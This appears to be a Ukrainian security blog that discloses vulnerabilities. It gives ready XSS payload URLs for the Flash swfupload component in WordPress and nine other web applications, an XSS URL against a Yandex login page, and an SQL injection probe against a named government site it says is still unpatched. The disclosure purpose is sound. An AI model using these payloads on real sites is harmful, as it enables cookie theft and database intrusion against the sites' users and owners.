Websecurity - Веб безпека

В даній добірці уразливості в веб додатках:

• Oracle Business Transaction Management Server FlashTunnelService Remote File Deletion (деталі)
• SilverStripe CMS 2.4.7 <= Arbitrary URL Redirection (деталі)
• SilverStripe CMS 2.4.7 <= Persistent Cross Site Scripting Vulnerability (деталі)
• ASTPP VoIP Billing (4cf207a) - Multiple Web Vulnerabilities (деталі)
• Off-by-one error in libxml2 (деталі)
• Knowledge Base EE v4.62.0 - SQL Injection Vulnerability (деталі)
• Multiple vulnerabilities in Ezylog photovoltaic management server (деталі)
• XSS Vulnerabilities in TaskFreak (деталі)
• Microsoft Security Bulletin MS12-058 - Critical Vulnerabilities in Microsoft Exchange Server WebReady Document Viewing Could Allow Remote Code Execution (деталі)
• XSS Vulnerabilities in CMSMini (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах My Question, A/B Test та Easy Webinar. Для котрих з’явилися експлоіти. My Question - це плагін для створення опитувань, A/B Test - це плагін для A/B тестування, Easy Webinar - це плагін для створення онлайн-семінарів.

• XSS in answer my question plugin (деталі)
• WordPress Abtest Directory Traversal (деталі)
• WordPress Easy Webinar Blind SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

15.11.2012

Раніше я писав про XSS уразливість в Dotclear, XenForo, InstantCMS, AionWeb, Dolphin (в swfupload) і ця дірка має місце в багатьох інших веб додатках.

Якщо в попередньому записі я писав про веб додатки з swfupload.swf (який призначений для Flash Player 10), то зараз я напишу про веб додатки з swfupload_f9.swf (який призначений для Flash Player 9). Зокрема я виявив дану Cross-Site Scripting уразливість в AionWeb, ExpressionEngine, Liferay Portal (Community Edition, який раніше називався Standard Edition, і Enterprise Edition), SurgeMail, symfony - серед багатьох веб додатків, що постачаються з swfupload_f9.swf.

XSS:

AionWeb:

http://site/engine/classes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/engine/classes/swfupload/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

В AionWeb присутні обидві версії флеш додатку (а також версія для Flash Player 8, про яку я напишу згодом).

ExpressionEngine:

http://site/cms/themes/cp_themes/default/images/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Liferay Portal:

http://site/html/js/misc/swfupload/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

SurgeMail:

http://site/surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

В SurgeMail присутні обидві версії флеш додатку (а також версія для Flash Player 8, про яку я напишу згодом).

symfony:

http://site/plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Уразливі потенційно всі версії AionWeb, ExpressionEngine, Liferay Portal (Community Edition, який раніше називався Standard Edition, і Enterprise Edition), SurgeMail, symfony (при цьому 20.04.2012 дана уразливість була виправлена в WordPress 3.3.2).

Розробники WP випустили оновлену версію флешки (те саме зробили розробники XenForo), яку могли використати всі веб розробники, що використовують swfupload.

06.12.2012

Замінив Magento на ExpressionEngine, т.к. я виявив, що уразливим є саме цей движок. На сайті, де я знайшов флешку, був встановлений Magento. Але сьогодні я виявив, що на цьому сайті також встановлений EE, а також EE використовується на інших сайтах з аналогічною темою (в якій знаходиться swf-файл).

Раніше я писав про XSS уразливість в swfupload в WordPress і ця дірка має місце в багатьох інших веб додатках.

Зокрема я виявив дану Cross-Site Scripting уразливість в Dotclear, XenForo, InstantCMS, AionWeb, Dolphin - серед багатьох веб додатків, що постачаються з swfupload.swf.

XSS:

Dotclear:

http://site/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

XenForo:

http://site/js/swfupload/Flash/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

InstantCMS:

http://site/includes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

AionWeb:

http://site/engine/classes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Dolphin:

http://site/plugins/swfupload/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// 

Уразливі потенційно всі версії Dotclear, InstantCMS, AionWeb, Dolphin (при цьому 20.04.2012 дана уразливість була виправлена в WordPress 3.3.2).

Уразливі версії XenForo 1.0.0 - 1.1.2. В XenForo 1.1.3 дана уразливість була виправлена і випущений патч для попередніх версій (ще 19.06.2012).

Розробники WP випустили оновлену версію флешки (те саме зробили розробники XenForo), яку могли використати всі веб розробники, що використовують swfupload.

В квітні була анонсована Cross-Site Scripting уразливість в swfupload.swf в WordPress (CVE-2012-3414). Яка була виправлена в WordPress 3.3.2. Але на той час про неї не було жодної детальної інформації. Ця дірка була знайдена Neal Poole і Nathan Partlan. І 17.05.2012 Ніл оприлюднив її в себе на сайті.

На початку місяця я звернув увагу, що почали з’являтися нові описи XSS дірки в swfupload.swf в інших веб додатках. Як у плагіні WordPress Shopp, де я її знайшов. З чого стало зрозумілим, що деталі цієї уразливості вже були оприлюднені.

Після чого я зробив дослідження і виявив різні версії swf-файла (з різними іменами) та всі версії WordPress, що містять будь-які з цих swf-файлів. Тобто не одна флешка (згадана Нілом), а дві флешки з різними іменами мають цю XSS. Це лише в WP, бо існують версії цієї флешки ще з іншими іменами в інших веб додатках, про що я розповім окремо.

XSS:

http://site/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

WordPress 2.7-3.3.1.

http://site/wp-includes/js/swfupload/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

WordPress 2.5-2.7.1.

20.04.2012 в WordPress 3.3.2 дана уразливість була виправлена. Розробники WP випустили оновлену версію флешки, яку могли використати всі веб розробники, що використовують swfupload.

Уразливі версії WordPress 2.5 - 3.3.1.

Файл swfupload.swf постачається з WordPress 2.7 - 3.3.1.

Файл swfupload_f9.swf постачається з WordPress 2.5 - 2.7.1.

У версіях WP 2.7 - 2.7.1 присутні обидві флешки.

Swfupload використовується в WordPress, в плагінах до нього та в інших веб додатках. Уразливість в swfupload - це дірка “мільйонник”. Тільки в одному WP вона була поширена на десятках мільйонах сайтів (за статистикою wordpress.com, зараз в світі більше 57,5 мільйонів сайтів на WP).

В даній добірці уразливості в веб додатках:

• Symantec Endpoint Protection SemSvc.exe AgentServlet Remote Code Execution Vulnerability (деталі)
• Unirgy uStoreLocator SQL Injection - Magento extension (деталі)
• CMSQLITE v1.3.2 - Multiple Web Vulnerabiltiies (деталі)
• Multiple vulnerabilities in Template CMS (деталі)
• SAP Crystal Reports crystalras.exe OBUnmarshal Remote Code Execution Vulnerability (деталі)
• Multiple vulnerabilities in OpenX (деталі)
• Multiple vulnerabilities in jCore (деталі)
• Multiple vulnerabilities in Subrion CMS (деталі)
• (0Day) HP Diagnostics Server magentservice.exe Remote Code Execution Vulnerability (деталі)
• Multiple vulnerabilities in AContent (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах GRAND Flash Album Gallery, Spider Calendar та Shopp. Для котрих з’явилися експлоіти. GRAND Flash Album Gallery - це плагін для створення фото галерей, Spider Calendar - це органайзер і календар, Shopp - це плагін для створення онлайн-магазина.

• Multiple Vulnerabilities in Wordpress GRAND Flash Album Gallery Plugin (деталі)
• WordPress Spider 1.0.1 SQL Injection / XSS (деталі)
• WordPress Shopp 1.0.17 XSS / Shell Upload / Disclosure (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Як я вже писав в новинах, з кінця вересня Яндекс розпочав свою програму “Полювання за помилками” і почав платити за уразливості. Я вирішив перевірити, що саме представляє з себе ця програма.

В жовтні, 05.10.2012, я знайшов Cross-Site Scripting уразливість на сайті http://pass.yandex.ru. Про що повідомив Яндексу. А також я знайшов багато інших уразливостей, але вирішив вислати одну - для початку.

Останній раз стосовно проектів Яндекс я писав про уразливості на afisha.yandex.ru.

XSS:

http://pass.yandex.ru/login?retpath=http://yandex.ru%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Скріншот:

Yandex XSS.png

Вже 06.10.2012, через пів доби після того, як я відправив їм листа, мені відповів представник компанії, що він не може відтворити дану уразливість (достатньо просту XSS, детальний опис якої я виклав у своєму листі, в тому числі кроки для відтворення). На що я їм написав, що ця XSS працює лише для залогінених користувачів, як вже зазначав у першому листі, та вислав їм скріншот (зроблений заздалегідь, бо я підозрював Яндекс у нечесності). Вже після відправлення цього листа, я перевірив цю дірку і виявив, що вона вже виправлена.

Після чого отримав відповідь від Яндекса, що мовляв цю дірку їм хтось інший повідомив раніше (ага, дірка висіла на сайті роками і ніхто її не знаходив до мене, і лише після мого повідомлення вона була виправлена). Тому вони мені її не зараховують. Зазначу, що представник компанії спочатку “не впізнав” уразливості та заявив, що нічого такого немає (бо не знав, що я зробив скріншот), і вже після отримання від мене скріншота, він “впізнав” її та почав розповідати нову історію. І на мою незгоду з такою позицією компанії, висловлену в наступному листі, вони не відповіли (тим самим закривши це питання).

Вся ця поведінка Яндекса не викликала в мене позитивних емоцій. Але щоб не робити висновки по одному інциденту я вирішив вислати компанії ще декілька інших уразливостей, щоб детально перевірити цю програму, розставити всі крапки над “і” та зробити фінальні висновки. Про які я напишу найближчим часом.

18.07.2012

У липні, 02.07.2012, я дослідив SQL Injection та Cross-Site Scripting уразливості на сайті http://www.asv.gov.ua. Про які мені повідомив AmplenuS, а коли я ці дві дірки перевірив, то знайшов іще одну. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

02.11.2012

SQL Injection:

http://www.asv.gov.ua/content.php?lang=uk&page=gallery&theme=-1%20or%20version()%3E5

У липні в них була версія MySQL 5.1.63-log, зараз MySQL 5.1.66-log. СУБД оновити не забули, але дірки на сайті як не виправляли, так і не виправляють.

XSS:

• alert(document.cookie)
• alert(document.cookie)
• цікавий
• html включення

Дані уразливості досі не виправлені.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Social Discussions, Download Monitor та DM FileManager. Для котрих з’явилися експлоіти. Social Discussions - це плагін для інтеграції сайта з соціальними мережами, Download Monitor - це плагін для ведення статистики скачувань файлів, DM FileManager - це файловий менеджер.

• Multiple Vulnerabilities in Wordpress Social Discussions Plugin (деталі)
• Wordpress Download Monitor - Download Page Cross-Site Scripting (деталі)
• DM FileManager Remote File Inclusion (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.